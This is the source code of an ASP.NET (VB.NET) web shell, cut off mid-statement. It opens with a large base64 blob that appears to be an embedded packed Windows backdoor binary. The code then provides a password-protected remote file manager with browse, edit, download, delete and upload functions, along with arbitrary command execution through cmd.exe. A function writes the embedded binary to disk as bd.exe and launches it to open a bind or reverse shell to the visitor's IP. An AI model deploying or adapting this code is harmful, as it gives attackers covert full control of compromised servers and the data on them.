"WqUUi8NbqW0W+sdKLYuMkLY7e9ilgJBEiDeLEnAR9gtvZVXdg2X8hEhEC9aLCwEMtdB1B5FJFKb/" & _ "LlwcX4v+IzkL13Tpi5cbhzXryjP/XFhNdkz/7mB3V851DWZqIGRfhcl8BdHhR66u2+7r94sgVPlD" & _ "Cit/8XuNRk3/wf4EToP+P374Xjeb0qaTzA0BJGEgfSsRt6UOAu84nNPz7CM3ynH3XIhEiQP+D3Xq" & _ "Yewh0WID6QvrMRcrlSu4douhMiEZKTaYLCbnKASFIgrArk2vy3oE+ACVr3oIkNt+rmqEoql88UIM" & _ "pVkGkFoiwmQG1VLpZv4LfSnEmQsujW2uxxFiv7DOjAk7gN12yQqPCXyu6y8ovg9po+VOtgl7BLG8" & _ "cD3Sxa0Wvu4JN2p0uaVfOnQLiQqJA/yyeXVt+G0bvNEiARIy/J+LDnr8VqohJQ8+dRo7HfLQiNSV" & _ "60s7pAbSpbpgaxGJUEIECAY9OCkCDW/sMN26wf9ddTBfiVBy4JCWBaW0V5doMIPCBirHdIicDX/B" & _ "YsA9CmjEQeAIR7bPTEUwjTSBM2SJRvZBA/0QdCpqBGj/aLJXGfQGMMhgDB12EFe11ICB/N18TqAW" & _ "+60kxYl+BP8FYkFwHapdqovGsu7po/WNrktxyEEIM9vFT+vjRrPgQ8M3acCBWvvEdhtjMIJF6kAI" & _ "AgTdujVsnEoe+4XB5995DBcw5LOLEIAARQ36TSbRJycVjZcAcCNocGn7+nc8jUd3SPKDiH5mMO/u" & _ "9I2I/AbHQPzwQg56n/vt7/+lSATHgOgQFAVW3lE3WCzwlnbHI08MBfjeugLghukmiayNSgyH28vW" & _ "CI9BZJ5EQrye41Wq8RYsQ4rIC6BGq1vdeohOQwsJeMIsCjgoMMtofmrPj4rQ2KvkYFZCeJDo4WhE" & _ "RDBczWeLNbl42FBBhjhEs9ZhB37P/il0UGgoEGgUB6Nkbnop3uHWo2i8C94W/9BdvWf/PXQOoWgQ" & _ "BVMRvhigV6phA0FNjgdWR1zr+I8MV5SsUrv6elZTi9ndFPebTgVvqHEkEG7bdW/rIdbVjii8s3Ql" & _ "gSkfN/tfe3XrLR1Rg+MDdA0gHaEOKlQv8CBbNVB6z2jDyXQSOoN30j0DcRE67mwYgAjQNi76Kpgg" & _ "I8B292Ov+gYny3LyFoPG3iweDLXCtyN1xjnrGIHixwwt9kjTCQ4ABDPSU+5s97ttVQoEiQdfdfiw" & _ "dYWjAjlCMFlQRLWCUuQcVJ8QXAI+f0ZX8ltTZIme4FbUVtaMs5XfRhMdI+siIAxRTwg+G4heIgEI" & _ "3mLSWWxcFH4QoHEHRFRdzllZ5WDrotfJHRMdFhy8JQQu2XRIyOb5EHMqOtN9IAQbs3Ygcy5/JKCD" & _ "5yVzIP+Lc+RNnIjW14VWGQRgmxCCG3fEQdw2CMGGX+sTcP8mBby1sRGLOGfcdGa6ZG22M9xhIVf0" & _ "TS/iLObsGqWMD+1/iRJPRfd0MvZFDQR0QD6zm6m2HHiyQNV/HtrAbG1kMkjSj1C6kIayyMeD8gvZ" & _ "XN2zNtyJXeAuVkoyEluyfXfKutbfdM9k5Gd0nI+4zW43s3UEA+sGjChoIPggNmaU1VC/t3ELFKGL" & _ "z8Zx0QgAlkrNi0RW/EoNEmywUELsQO1J9NjcEt3zDF7IKx6DwuSCkxaKdH4PODL1OqqBtwSe2eRA" & _ "SXBrf2g8y5HPCYA7eDz8O5ACJNh1BLwD4Dt/CDkA8mg8aDw0XTdYP18GTANEPAk2TdM0LCQcPH/u" & _ "M4cAaDzwgAMDkASbjKA8fwDnEfKQPrA9CD1IsOt+LJAYCzgDYD1/yCGQVwA+AD66brBQW7R/vAPE" & _ "bJqmaczU3OT3PU4IARJ/HxAgwabrBRgDKDw+fxFm+gXM/yXAmgA1anMA/6sWSitBj8wDF00YkwPb" & _ "pv6/cnVudGltZSBlcnJvclENCgNUAflv9kxPU1MRDgBTSU5H/rL2AlNPTUESEVI2MDI4t7+83Qgt" & _ "IEthYmx0byBpbmlWYWw/3+zbaXoNaGVhcDcnN25vdLZvcGs9BHVn7nNwYWMjZuw2YO97bG93aThh" & _ "Bm9uNyB5Crk2c3RkWvvtZzVwdXIrdmlydHUhM77Y9tulYyMgYwxsKF802nabQl8qZXhcL1iwk732" & _ "BtziXzE599vu5r5vcGVYMXNvD2Rlc2NrbTJgKzhGJIHfQIhwZWQZVyM3dms0JG2brHRovyGM5Nth" & _ "L2xvY2sXmtsGWzRkt2EuAvat4daiIXJtAHBAZ3JhbSB7IRS2Sm02LzA5T6MZWgoQQSorFPK5RjAu" & _ "Kzg9D+H7YXJndShzXzAyZott267Bbm5ngm8FdDoR0ApnrWTmf00tYBj/8LY5ZhVWaXOqQysrIFKg" & _ "Ye67PUxpYrRyeScKLRYaZ9vDRQ4hEVDUOsI2rEDZAC7v5eD89ra5JSxrbHduPhtHZXRMYbELd2wy" & _ "QQJ2ZVCudXAT/61tZw9XlWQmh2Vzc2FnZUJvNb6wxHhBfXMlMzIuZCrPtaInN745SAMLVJhrxHI6" & _ "IAMAq6QeQF4pp7Zq9ftSU01TUwdlbZk0U1ffAKX5v3MgTWFuDucoQnZyAFwv2gOZZMq2ACABKCCZ" & _ "SB4ASAAQhEAmZAAQgQZkCGQBEIJkCGRAAhDuqsrcvwABB9sIdZAu2xhbBR/AZJBukAsdCwSWQAZp" & _ "Bo0IjmRABmSPkJEFZEAGkpOyLEQHCAfvCowkLwtvDKsABZMZ9zWgb6uIbD9cB03TNE0JMAoMEOB0" & _ "r2mWQhGwElcHExczTdNgGChYB033lk0ayEEbuwccaDRN0zR4WHlIetM0TdM4/DT/JKuInQRTAgTS" & _ "ReTZwb5ggnmCIRem3wehpbx5/v2Bn+D8L0B+gPyowaPao0HOHmGXgf4HQG6QIbC1L0G2X+cr5P/P" & _ "ouSiGgDlouiiW36h/lfy291RBQPaXtpfX9pq2jLT4GXn9tje4Pk5MX4A+AMyKCKwWdnVUVF8RyQw" & _ "/f8GoE1EQnl0ZVRvV2lkZUNoYXID8H+7FFVuBm5kbGVkRXhjZXAF+la5bUZpJmUZD0N1cnK2oFWt" & _ "v1UAcwJw2dYSI2kMQ1iTbIO1KA5BL1NEe+wLwGlytm9yeUFFU3lzJ7PWDmxtFFNvaxtq9hvAdGGP" & _ "cEluZm8s7rNXuZbNgG9tbZ7J2jD3TGluZR61v8q2JABjJUWTT3L7F1sAWXMWmkFkZHKtCUABGExh" & _ "PABHArpJVgVBbGANYGtMDUiBCj32NztSZQxDQUNQB01vZCycRbhyZUgqqFYjc2fBHjMtC09FTSd/" & _ "VIBlwt55cCUPV1RruyU8ajSVQ01vIxCwCTtBDVd1ZUMB2JBlTr84RnJmKWxl7RhFbu3s0Jpe20R2" & _ "Gm95ZhGGEDZXxeUbrAEUelvDZBIxey82DY3PTzZ7SZgEUIYYCc1QbnxSdGxgd2m8YfA0G7F0ypGJ" & _ "AENw2Iy4ZnNlYGJPsDPiFjtTQ2xBDyPYjFkiZAw5CFgymnGGIRrbBfZRDkPlbIYtxF4Cn3RjaFvp" & _ "ZzYLmKMO7B+GHMu2aballsz/AwI0FnfLsiwEAgENzlNBU9vmaAGIIQ4JAgj8lyctc4JQRUwBAwCJ" & _ "C5Q/jIj9h+AADwELAQb0J3Zy2R3UFQQQAEAAEA+2YRNiEgcXYOxsFkyiDBAHy73sDQYAaESDR0DW" & _ "DQii/B7WEBvBLhh0Oi6Q4LOQDTCY+mAuck2YdYaLJwlTA5pb7JRqQC4mJxwKUPKbkkFQwBO0RQAA" & _ "aMVvsyQAAAD/AAAAAAAAAAAAAABgvgBQQACNvgDA//9Xg83/6xCQkJCQkJCKBkaIB0cB23UHix6D" & _ "7vwR23LtuAEAAAAB23UHix6D7vwR2xHAAdtz73UJix6D7vwR23PkMcmD6ANyDcHgCIoGRoPw/3R0" & _ "icUB23UHix6D7vwR2xHJAdt1B4seg+78EdsRyXUgQQHbdQeLHoPu/BHbEckB23PvdQmLHoPu/BHb" & _ "c+SDwQKB/QDz//+D0QGNFC+D/fx2D4oCQogHR0l19+lj////kIsCg8IEiQeDxwSD6QR38QHP6Uz/" & _ "//9eife5cAAAAIoHRyzoPAF394A/A3XyiweKXwRmwegIwcAQhsQp+IDr6AHwiQeDxwWI2OLZjb4A" & _ "UAAAiwcJwHRFi18EjYQwAHAAAAHzUIPHCP+WUHAAAJWKB0cIwHTcifl5Bw+3B0dQR7lXSPKuVf+W" & _ "VHAAAAnAdAeJA4PDBOvY/5ZkcAAAi65YcAAAjb4A8P//uwAQAABQVGoEU1f/1Y2H5wEAAIAgf4Bg" & _ "KH9YUFRQU1f/1VhhjUQkgGoAOcR1+oPsgOnbof//AAAAAAAAAAAAAAAAAAAAAAAAAHyAAABQgAAA" & _ "AAAAAAAAAAAAAAAAiYAAAGyAAAAAAAAAAAAAAAAAAACWgAAAdIAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAoIAAAK6AAAC+gAAAzoAAANyAAADqgAAAAAAAAPiAAAAAAAAAcwAAgAAAAABLRVJORUwzMi5E" & _ "TEwAQURWQVBJMzIuZGxsAFdTMl8zMi5kbGwAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MA" & _ "AFZpcnR1YWxQcm90ZWN0AABWaXJ0dWFsQWxsb2MAAFZpcnR1YWxGcmVlAAAARXhpdFByb2Nlc3MA" & _ "AABPcGVuU2VydmljZUEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" '//################# FUNCTION GOES HERE #######################==============================================] Private Declare Auto Function SHGetFileInfo Lib "shell32.dll" ( _ ByVal pszPath As String, _ ByVal dwFileAttributes As Int32, _ ByRef psfi As SHFILEINFO, _ ByVal cbFileInfo As Int32, _ ByVal uFlags As Int32) As IntPtr <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Auto, Pack:=1)> _ Private Structure SHFILEINFO Private Const MAX_PATH As Int32 = 260 Public hIcon As IntPtr Public iIcon As Int32 Public dwAttributes As Int32 <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=MAX_PATH)> _ Public szDisplayName As String <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=80)> _ Public szTypeName As String End Structure Private Const SHGFI_TYPENAME As Int32 = &H400 Private Function GetFileDescription(ByVal FileName As String) As String Dim shfi As SHFILEINFO = Nothing SHGetFileInfo(FileName, 0, shfi, Marshal.SizeOf(shfi), SHGFI_TYPENAME) Return shfi.szTypeName End Function Function xcleanpath(ByVal path As String) As String Dim strlen As String path = urldecode(Trim(path)) strlen = Len(path) If strlen > 0 Then Do While ((Mid(path, strlen) = "\") And (strlen > 0)) strlen = strlen - 1 path = Mid(path, 1, strlen) Loop Return path & "\" End If Return path End Function Function is_dir(ByVal path As String) As Boolean path = urldecode(path) Try Dim dInfo As New DirectoryInfo(path) If dInfo.Exists Then Return True End If Catch ex As Exception End Try Return False End Function Function is_file(ByVal path As String) As Boolean path = urldecode(path) Try Dim fInfo As New FileInfo(path) If fInfo.Exists Then Return True End If Catch ex As Exception End Try Return False End Function Function dirname(ByVal path As String) As String If (is_dir(path)) Then Dim di As New DirectoryInfo(path) Return xcleanpath(di.FullName) Else If (is_file(path)) Then Dim fi As New FileInfo(path) Return xcleanpath(fi.DirectoryName) End If End If Return xcleanpath(path) End Function Function nl2br(ByVal text As String) As String Return Replace(text, vbCrLf, "<br />") End Function Function urldecode(ByVal str As String) As String Return Server.UrlDecode(str) End Function Function urlencode(ByVal str As String) As String Return Server.UrlEncode(str) End Function Function base64_decode(ByVal base64String As String) As String Const Base64 As String = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" base64String = Replace(base64String, vbCrLf, "") base64String = Replace(base64String, vbTab, "") base64String = Replace(base64String, " ", "") Dim dataLength As String = Len(base64String) Dim sOut As String = "" For groupBegin As Integer = 1 To dataLength Step 4 Dim CharCounter, thisData As Integer Dim thisChar, pOut As Char Dim numDataBytes As Integer = 3 Dim nGroup As Integer = 0 For CharCounter = 0 To 3 thisChar = Mid(base64String, groupBegin + CharCounter, 1) If thisChar = "=" Then numDataBytes = numDataBytes - 1 thisData = 0 Else thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1 End If nGroup = 64 * nGroup + thisData Next nGroup = Hex(nGroup) nGroup = StrDup(6 - Len(nGroup), "0") & nGroup pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 5, 2))) sOut = sOut & Left(pOut, numDataBytes) Next Return sOut End Function Function sort(ByVal arr_ As Array) As Array Dim buff As String = "" Dim temp As String = "" For Each b As String In arr_ buff = buff & b & "|" Next If ((Len(buff) - 1) > 0) Then Dim arr As Array = Split(Mid(buff, 1, Len(buff) - 1), "|") For i As Integer = UBound(arr) - 1 To 0 Step -1 For j As Integer = 0 To i If ((arr(j)) > (arr(j + 1))) Then temp = arr(j + 1) arr(j + 1) = arr(j) arr(j) = temp End If Next Next Return arr End If Return arr_ End Function Function htmlspecialchars(ByVal text As String) As String text = Replace(text, "&", "&") text = Replace(text, """", """) text = Replace(text, "'", "'") text = Replace(text, "<", "<") text = Replace(text, ">", ">") Return text End Function Function xfilesave(ByVal FileName As String, ByVal allbytes() As Byte) As Boolean Dim fi As New FileInfo(FileName) If fi.Exists Then fi.Delete() If fi.Exists Then Return False End If End If File.WriteAllBytes(FileName, allbytes) Dim ffi As New FileInfo(FileName) If ffi.Exists Then Return True End If Return False End Function Function xfileopen(ByVal filepath As String, ByVal binary As Boolean) As String filepath = urldecode(filepath) If (binary) Then Dim fi As New FileInfo(filepath) If fi.Exists Then Return System.Text.Encoding.UTF8.GetString(File.ReadAllBytes(filepath)) End If Else Dim fi As New FileInfo(filepath) If fi.Exists Then Return File.ReadAllText(filepath) End If End If Return "" End Function Function xparsefilesize(ByVal size As Integer) As String If (size <= 1024) Then Return size Else If (size <= 1024 * 1024) Then Return FormatNumber(size / 1024, 2) & " kb" Else Return FormatNumber(size / 1024 / 1024, 2) & " mb" End If End If End Function Function xfileperms(ByVal fpath As String) As String Dim isreadable As String = "r" Dim iswriteable As String = "-" If is_file(fpath) Then Dim fi As New FileInfo(fpath) If Not (fi.Attributes And FileAttributes.ReadOnly) Then iswriteable = "w" End If ElseIf is_dir(fpath) Then Dim fi As New DirectoryInfo(fpath) If Not (fi.Attributes And FileAttributes.ReadOnly) Then iswriteable = "w" End If End If Return isreadable & " / " & iswriteable End Function Function xdateformat(ByVal tgl As Date) As String Return tgl.ToString("dd-MMM-yyyy HH:mm") End Function Function xfilelastmodified(ByVal fpath As String) As String fpath = urldecode(fpath) If ((is_dir(fpath)) Or (is_file(fpath))) Then Dim di As New DirectoryInfo(fpath) Return xdateformat(di.LastWriteTime) End If Return "???" End Function Function xparentfolder(ByVal sdir As String) As String sdir = urldecode(sdir) If Directory.Exists(sdir) Then Dim di As New DirectoryInfo(sdir) If di.Parent IsNot Nothing Then Dim testt As String = xcleanpath(di.Parent.FullName) Return testt End If End If Return sdir End Function Function xfilesummary(ByVal fpath As String) As String Dim buff As String = "" If (is_file(fpath)) Then buff = "Filesize : " & xparsefilesize(xfilesize(fpath)) & " ( " & xfilesize(fpath) & " ) <span class=""gaul""> :: </span>Permission : " & xfileperms(fpath) & " ( " & xfileowner(fpath) & " )<span class=""gaul""> :: </span>modified : " & xfilelastmodified(fpath) End If Return buff End Function Function xfilesize(ByVal fpath As String) As Long If (is_file(fpath)) Then Dim fi As New FileInfo(fpath) Return fi.Length End If Return 0 End Function Function xfileowner(ByVal fpath As String) As String If (is_file(fpath)) Then Dim fi As New FileInfo(fpath) Dim ds As System.Security.AccessControl.FileSecurity = fi.GetAccessControl Dim ir As System.Security.Principal.IdentityReference = ds.GetOwner(GetType(System.Security.Principal.NTAccount)) Return ir.Value.Substring(InStr(ir.Value.ToString, "\")) ElseIf (is_dir(fpath)) Then Dim di As New FileInfo(fpath) Try Dim ds As System.Security.AccessControl.FileSecurity = di.GetAccessControl Dim ir As System.Security.Principal.IdentityReference = ds.GetOwner(GetType(System.Security.Principal.NTAccount)) Return ir.Value.Substring(InStr(ir.Value.ToString, "\")) Catch ex As Exception End Try End If Return "???" End Function Function ekse(ByVal cmd As String, ByVal cwd As String) As String Dim p As System.Diagnostics.Process = New System.Diagnostics.Process() With p.StartInfo .FileName = Environ("COMSPEC") .CreateNoWindow = True .RedirectStandardInput = True .RedirectStandardOutput = True .RedirectStandardError = True .UseShellExecute = False .WorkingDirectory = xcleanpath(urldecode(Request.QueryString("dir"))) .Arguments = "/C " & cmd End With p.Start() Dim all As String = p.StandardOutput.ReadToEnd p.Close() Return all End Function Function OSver() As String Return System.Environment.OSVersion.VersionString End Function Function xparsedir(ByVal dir As String) As String Dim dirs() As String = Split(dir, "\") Dim buff As String = "" Dim dlink As String = "" For Each d As String In dirs d = Trim(d) If (d <> "") Then dlink = dlink & urlencode(d & "\") buff &= "<a href=""?dir=" & dlink & """>" & d & " " & "\" & "</a> " End If Next Return "<span class=""gaul"">[ </span>" & buff & "<span class=""gaul""> ]</span>" End Function Function xrunexploit(ByVal fpath As String, ByVal base64 As String, ByVal port As String, ByVal ip As String) As Boolean Dim con() As Byte = Convert.FromBase64String(wBind) Dim ok As Boolean = False Dim final As String = "" If (is_file(fpath)) Then File.Delete(fpath) End If If (xfilesave(fpath, con)) Then Dim p As Process = New Process With p.StartInfo .FileName = fpath .CreateNoWindow = True .Arguments = port & " " & ip End With p.Start() Return True End If Return False End Function Function xdrive() As String Dim buff, letters, lett As String letters = "" buff = "" For Each letter As DriveInfo In DriveInfo.GetDrives lett = Mid(letter.Name, 1, 1) letters = "<a href=""?dir=" & lett & ":\""><span class=""gaul"">[ </span>" letters &= lett letters &= "<span class=""gaul""> ]</span</a> " buff &= letters Next If (buff <> "") Then buff = buff & "<br />" End If Return buff End Function Public Sub xrmdir(ByVal path As String) path = xcleanpath(path) path = Mid(path, 1, Len(path) - 1) Dim di As New DirectoryInfo(path) If di.Exists Then For Each di_ As DirectoryInfo In di.GetDirectories xrmdir(di_.FullName) Next For Each fi_ As FileInfo In di.GetFiles fi_.Delete() Next End If di.Delete() End Sub Function xdir(ByVal path As String) As String path = Trim(urldecode(path)) path = xcleanpath(path) Dim buff, sf, sd, dd, nextdir As String buff = "" If (is_dir(path)) Then Dim fi As New DirectoryInfo(path) Dim xfname As New ArrayList Dim xdname As New ArrayList For Each xf As FileInfo In fi.GetFiles xfname.Add(xf.FullName) Next For Each xd As DirectoryInfo In fi.GetDirectories xdname.Add(xd.FullName) Next xfname.Sort() xdname.Sort() buff = "<div id=""explorer""><table class=""tblExplorer"">" & _ "<tr><th>Filename</th>" & _ "<th style=""width:80px;"">Filesize</th>" & _ "<th style=""width:80px;"">Permission</th>" & _ "<th style=""width:150px;"">Last Modified</th>" & _ "<th style=""width:180px;"">Action</th></tr>" If (Len(path) > 3) Then sd = "." dd = xcleanpath(path) buff &= "<tr onmouseover=""this.style.cursor='pointer';this.style.cursor='hand';"" onclick=""window.location= '?dir=" & urlencode(dd) & "';"">" & _ "<td><span style=""font-weight:bold;""><a href=""?dir=" & xcleanpath(dd) & """>[</span> " & sd & " <span style=""font-weight:bold;"">]</span></a></td>" & _ "<td>DIR</td>" & _ "<td style=""text-align:center;"">" & xfileperms(dd) & "</td>" & _ "<td style=""text-align:center;"">" & xfilelastmodified(dd) & "</td>" & _ "<td style=""text-align:center;""><a href=""?dir=" & dd & "&properties=" & xcleanpath(dd) & """>Properties</a> | <a href=""?dir=" & xcleanpath(xparentfolder(dd)) & "&del=" & xcleanpath(dd) & """>Remove</a></td>" & _ "</tr>" sd = ".." dd = xcleanpath(xparentfolder(path)) buff &= "<tr onmouseover=""this.style.cursor='pointer';this.style.cursor='hand';"" onclick=""window.location= '?dir=" & urlencode(dd) & "';"">" & _ "<td><span style=""font-weight:bold;""><a href=""?dir=" & dd & """>[</span> " & sd & " <span style=""font-weight:bold;"">]</span></a></td>" & _ "<td>DIR</td>" & _ "<td style=""text-align:center;"">" & xfileperms(dd) & "</td>" & _ "<td style=""text-align:center;"">" & xfilelastmodified(dd) & "</td>" & _ "<td style=""text-align:center;""><a href=""?dir=" & xcleanpath(dd) & "&properties=" & xcleanpath(dd) & """>Properties</a> | <a href=""?dir=" & xcleanpath(xparentfolder(xparentfolder(dd))) & "&del=" & xcleanpath(dd) & """>Remove</a></td>" & _ "</tr>" End If For Each d As String In xdname Dim di As New DirectoryInfo(d) sd = di.Name nextdir = xcleanpath(path) buff &= "<tr onmouseover=""this.style.cursor='pointer';this.style.cursor='hand';"" onclick=""window.location= '?dir=" & urlencode(d) & "';"">" & _ "<td><span style=""font-weight:bold;""><a href=""?dir=" & xcleanpath(d) & """>[</span> " & sd & " <span style=""font-weight:bold;"">]</span></a></td>" & _ "<td>DIR</td>" & _ "<td style=""text-align:center;"">" & xfileperms(d) & "</td>" & _ "<td style=""text-align:center;"">" & xfilelastmodified(d) & "</td>" & _ "<td style=""text-align:center;""><a href=""?dir=" & xcleanpath(d) & "&properties=" & xcleanpath(d) & """>Properties</a> | <a href=""?dir=" & xcleanpath(nextdir) & "&del=" & xcleanpath(d) & """>Remove</a></td>" & _ "</tr>" Next For Each f As String In xfname Dim fiz As New FileInfo(f) sf = fiz.Name Dim View As String = "?dir=" & urlencode(path) & "&view=" & urlencode(f) buff &= "<tr onmouseover=""this.style.cursor='pointer';this.style.cursor='hand';"" onclick=""window.location='?dir=" & urlencode(xcleanpath(path)) & "&properties=" & urlencode(f) & "';""><td>" & _ "<a href=""?dir=" & urlencode(xcleanpath(path)) & "&properties=" & urlencode(f) & """>" & _ sf & "</a></td>" & _ "<td>" & xparsefilesize(xfilesize(f)) & "</td>" & _ "<td style=""text-align:center;"">" & xfileperms(f) & "</td>" & _ "<td style=""text-align:center;"">" & xfilelastmodified(f) & "</td>" & _ "<td style=""text-align:center;""><a href=""" & View & """>Edit</a> | <a href=""?get=" & f & """>Download</a> | <a href=""?dir=" & xcleanpath(path) & "&del=" & f & """>Remove</a></td>" & _ "</tr>" Next buff &= "</table></div>" End If Return buff End Function '//################# INIT GOES HERE #######################==================================================] Dim xCwd As String = "" Dim check As String = "" Dim uname As String = "" Dim auth As Boolean = False Public Sub Page_Load() On Error Resume Next Session.LCID = 2057 Server.ScriptTimeout = 600 ' server software Dim xSoftware As String = Request.ServerVariables("SERVER_SOFTWARE") ' uname -a Dim xSystem As String = OSver() ' server ip Dim xServerIP As String = Request.ServerVariables("LOCAL_ADDR") ' your ip ;-) Dim xClientIP As String = Request.ServerVariables("REMOTE_ADDR") Dim xHeader As String = xSoftware & "<br />" & xSystem & "<br />Server IP: <span class=""gaul"">[ </span>" & xServerIP & "<span class=""gaul""> ]</span> Your IP: <span class=""gaul"">[ </span>" & xClientIP & "<span class=""gaul""> ]</span>" Dim shell_style As String = "" & _ "<style type=""text/css"">" & _ "*{" & _ " font-family:Tahoma,Verdana,Arial;" & _ " font-size:12px;" & _ " line-height:20px;" & _ "}" & _ "form{" & _ " margin:0 auto;" & _ " text-align:center;" & _ "}" & _ "body{" & _ " background:url('" & Request.ServerVariables("SCRIPT_NAME") & "?img=bg') #333333;" & _ " color:#ffffff;" & _ " margin:0;" & _ " padding:0;" & _ "}" & _ "input,textarea{" & _ " background:url('" & Request.ServerVariables("SCRIPT_NAME") & "?img=bg') #111111;" & _ " height:24px;" & _ " color:#ffffff;" & _ " padding:1.5px 4px 0 4px;" & _ " margin:2px 0;" & _ " border:1px solid " & shell_color & ";" & _ " border-bottom:4px solid " & shell_color & ";" & _ " vertical-align:middle;" & _ "}" & _ "input:hover,textarea:hover{" & _ " background:#0a0a0a;" & _ "}" & _ "a{" & _ " color:#ffffff;" & _ " text-decoration:none;" & _ "}" & _ "a:hover{" & _ " border-bottom:1px solid #ffffff;" & _ "}" & _ "h1{" & _ " font-size:17px;" & _ " height:20px;" & _ " padding:2px 8px;" & _ " background:" & shell_color & ";" & _ " border:0;" & _ " border-left:4px solid " & shell_color & ";" & _ " border-right:4px solid " & shell_color & ";" & _ " border-bottom:1px solid #222222;" & _ " margin:0 auto;" & _ " width:90%;" & _ "}" & _ "h1 img{" & _ " vertical-align:bottom;" & _ "}" & _ ".box{" & _ " margin:0 auto;" & _ " background:#000000;" & _ " border:4px solid " & shell_color & ";" & _ " padding:4px 8px;" & _ " width:90%;" & _ " text-align:justify;" & _ "}" & _ ".gaul{" & _ " color:" & shell_color & ";" & _ "}" & _ ".result, .boxcode{" & _ " margin:0 auto;" & _ " border:1px solid " & shell_color & ";" & _ " font-family:Lucida Console,Tahoma,Verdana;" & _ " padding:8px;" & _ " text-align:justify;" & _ " overflow:hidden;" & _ " color:#ffffff;" & _ "}" & _ "#explorer, table{" & _ " width:100%;" & _ "}" & _ "table th{" & _ " border-bottom:1px solid " & shell_color & ";" & _ " background:#111111;" & _ " padding:4px;" & _ "}" & _ "table td{" & _ " padding:4px;" & _ " border-bottom:1px solid #111111;" & _ " vertical-align:top;" & _ "}" & _ ".tblExplorer tr:hover, .hexview td:hover{" & _ " background:" & shell_color & ";" & _ "}" & _ ".hidden{" & _ " display:none;" & _ "}" & _ ".tblbox td {" & _ " margin:0;" & _ " padding:0;" & _ " border-bottom:1px solid #222222;" & _ "}" & _ ".tblbox tr:hover{" & _ " background:none;" & _ "}" & _ "#mainwrapper{" & _ " width:100%;" & _ " margin:20px auto;" & _ " text-align:center;" & _ "}" & _ "#wrapper{" & _ " width:90%;" & _ " margin:auto;" & _ "}" & _ ".cmdbox{" & _ " border-top:1px solid " & shell_color & ";" & _ " border-bottom:1px solid " & shell_color & ";" & _ " margin:4px 0;" & _ " width:100%;" & _ "}" & _ ".fpath{" & _ " border-top:1px solid " & shell_color & ";" & _ " border-bottom:1px solid " & shell_color & ";" & _ " margin:4px 0;" & _ " padding:4px 0;" & _ "}" & _ ".fprop{" & _ " border-top:1px solid " & shell_color & ";" & _ " border-bottom:1px solid " & shell_color & ";" & _ " margin:4px 0;" & _ " padding:4px 0;" & _ "}" & _ ".bottomwrapper{" & _ " text-align:center;" & _ "}" & _ ".btn{" & _ " height:24px;" & _ " background:url('" & Request.ServerVariables("SCRIPT_NAME") & "?img=bg') #111111;" & _ " font-size:10px;" & _ " text-align:right;" & _ "}" & _ ".hexview , .hexview td{" & _ " font-family: Lucida Console,Tahoma;" & _ "}" & _ "</style>" If (Request.Form("passw") <> "") Then check = Trim(Request.Form("passw")) If (check = shell_password) Then Response.Cookies.Set(New HttpCookie("pass", check)) Response.Cookies("pass").Expires = Date.Now.AddDays(7) Else Response.Cookies.Set(New HttpCookie("pass", check)) Response.Cookies("pass").Expires = Date.MinValue End If End If If ((Request.Cookies("pass").Value <> "") And (Request.Form("passw") = "")) Then check = Request.Cookies("pass").Value End If If (check = shell_password) Then auth = True Else auth = False End If If (Request.QueryString("img") <> "") Then Dim sfile As String = Request.QueryString("img") If (is_file(sfile)) Then Response.Clear() Response.ContentType = "image/jpeg" Response.BinaryWrite(File.ReadAllBytes(sfile)) Response.End() Else Response.Clear() Response.Buffer = True Response.ContentType = "image/png" Dim buff As String If sfile = "bg" Then buff = bg Else buff = icon End If Response.BinaryWrite(Convert.FromBase64String(buff)) Response.End() End If End If If (Request.QueryString("get") <> "") Then Dim sFile As String = Request.QueryString("get") Dim fname As String = Mid(sFile, InStrRev(sFile, "\") + 1) Response.ContentType = "application/x-msdownload" Response.AddHeader("Content-transfer-encoding", "binary") Response.AddHeader("Content-Disposition", "attachment;filename=" & fname & "") Response.Write(xfileopen(sFile, True)) Response.End() End If If ((Request.QueryString("btnConnect") <> "") And (IsNumeric(Request.QueryString("bportC")))) Then Dim port As String = Request.QueryString("bportC") Dim fname As String = "bd.exe" Dim fpath As String = xcleanpath(urldecode(Trim(Request.QueryString("dir")))) & fname If (xrunexploit(fpath, wBind, port, xClientIP)) Then End If ElseIf ((Request.QueryString("btnListen") <> "") And (IsNumeric(Request.QueryString("lportC")))) Then Dim port As String = Request.QueryString("lportC") Dim fname As String = "bd.exe" Dim fpath As String = xcleanpath(urldecode(Trim(Request.QueryString("dir")))) & fname If (xrunexploit(fpath, wBind, port, "")) Then End If End If Dim uploaded As Boolean = False Dim newdir As String = "" If (Request.QueryString("dir") = "") Then xCwd = Mid(Request.ServerVariables("PATH_TRANSLATED"), 1, InStrRev(Request.ServerVariables("PATH_TRANSLATED"), "\")) Else newdir = xcleanpath(Trim(Request.QueryString("dir"))) If (is_dir(newdir)) Then xCwd = newdir End If If (Request.Form("btnNewUploadLocal") <> "") Then Dim uname As String If (Trim(ufname.Value) <> "") Then uname = Trim(ufname.Value) Else uname = filelocal.PostedFile.FileName End If filelocal.PostedFile.SaveAs(xcleanpath(xCwd) & uname) ElseIf (Request.Form("btnNewUploadUrl") <> "") Then Dim uname As String If (Trim(ufname.Value) <> "") Then uname = Trim(ufname.Value) Else Dim m As Match = Regex.Match(fileurl.Value, ".*\/([^/?]*)\??", RegexOptions.IgnoreCase) uname = 